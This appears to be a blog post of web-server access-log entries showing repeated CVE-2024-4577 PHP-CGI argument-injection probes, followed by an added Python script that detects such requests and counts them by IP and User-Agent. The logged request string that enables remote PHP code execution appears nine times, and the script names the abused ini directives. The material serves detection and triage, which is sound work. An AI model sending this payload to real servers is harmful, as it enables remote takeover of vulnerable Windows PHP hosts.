A large number of identical attacks arriving from different places (Uzbekistan, India, Kazakhstan, Russia, Turkmenistan, Ivory Coast); probably the same person or organization behind all of them.
84.54.70.166 - - [28/Mar/2025:19:28:02 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
103.1.103.81 - - [28/Mar/2025:19:55:28 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
95.59.244.0 - - [28/Mar/2025:20:01:34 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
188.232.103.100 - - [28/Mar/2025:20:06:02 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
185.69.185.169 - - [28/Mar/2025:20:09:15 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
213.230.120.119 - - [28/Mar/2025:20:15:46 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
95.59.244.0 - - [28/Mar/2025:20:21:17 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
41.207.204.167 - - [28/Mar/2025:21:30:40 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
49.47.129.57 - - [28/Mar/2025:22:41:33 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
After asking the great god Google: this is CVE-2024-4577, a PHP-CGI vulnerability in the XAMPP web-server bundle on Windows, exploited here for argument-injection remote command attacks (what puzzles me more is how there can be an IP ending in 0?).
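To turn the log lines above into a repeatable check, here is an added detection example (my own code, not something from the post or from XAMPP/PHP). It parses Apache combined-format lines, reproduces the two steps that make CVE-2024-4577 work (a query string with no literal `=` is handed to php-cgi as argv split on `+`, and Windows best-fit mapping turns the encoded soft hyphen `%AD` into an ASCII `-`), and flags any request whose resulting argv carries `-d` with a dangerous ini directive. The sample input reuses three lines from the post plus one constructed benign request; the regex, function names and the directive list are my own choices.

```python
"""Flag CVE-2024-4577-style php-cgi argument-injection probes in Apache access logs."""
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Apache "combined" log format (regex written for this example).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Sample input: first three lines are taken from the post above, the last one is a constructed benign request.
SAMPLE_LOG = """\
84.54.70.166 - - [28/Mar/2025:19:28:02 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
95.59.244.0 - - [28/Mar/2025:20:01:34 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
95.59.244.0 - - [28/Mar/2025:20:21:17 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
10.0.0.5 - - [28/Mar/2025:20:30:00 +0800] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

SOFT_HYPHEN = b"\xad"  # U+00AD; Windows best-fit mapping collapses it to '-'
# ini directives that let an attacker pull PHP code from the request body or a URL.
SENSITIVE_DIRECTIVES = (b"allow_url_include", b"auto_prepend_file", b"auto_append_file")


def cgi_argv(target: str) -> list:
    """Reproduce how a CGI query string becomes argv: only a query with no raw '=' is split on '+'."""
    if "?" not in target:
        return []
    query = target.split("?", 1)[1]
    if "=" in query:  # an unencoded '=' means "form data", never argv
        return []
    argv = []
    for part in query.split("+"):
        raw = unquote_to_bytes(part)           # %AD -> 0xAD, %3d -> '='
        argv.append(raw.replace(SOFT_HYPHEN, b"-"))  # simulate the best-fit mapping
    return argv


def is_php_cgi_injection(target: str) -> bool:
    """True when argv derived from the request carries -d with a sensitive directive."""
    path = target.split("?", 1)[0].lower()
    if "php-cgi" not in path and not path.endswith(".php"):
        return False
    argv = cgi_argv(target)
    for i, arg in enumerate(argv):
        if not arg.startswith(b"-d"):
            continue
        # Both "-dname=value" and "-d name=value" forms are accepted by php-cgi.
        directive = arg[2:] if len(arg) > 2 else (argv[i + 1] if i + 1 < len(argv) else b"")
        if any(directive.startswith(d) for d in SENSITIVE_DIRECTIVES):
            return True
    return False


def analyze(log_text: str) -> dict:
    """Return matching requests plus per-IP and per-User-Agent counts."""
    hits, by_ip, by_ua = [], Counter(), Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_php_cgi_injection(m["target"]):
            continue
        hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                     "argv": cgi_argv(m["target"])})
        by_ip[m["ip"]] += 1
        by_ua[m["ua"]] += 1
    return {"hits": hits, "by_ip": by_ip, "by_ua": by_ua}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for hit in result["hits"]:
        print(hit["ip"], hit["status"], hit["argv"])
    print("per IP:", dict(result["by_ip"]))
    print("per UA:", dict(result["by_ua"]))
```

The status column is what matters for triage: every hit in the post is a 403, so the probes were rejected, and any hit that comes back 200 is the one to investigate. Grouping by User-Agent (here the odd string "Hello") is a cheap way to confirm the author's hunch that one operator is behind many source addresses. As for the IP ending in 0: under classless addressing, 95.59.244.0 is an ordinary host address whenever the enclosing network is larger than a /24, so it is not a sign of spoofing on its own.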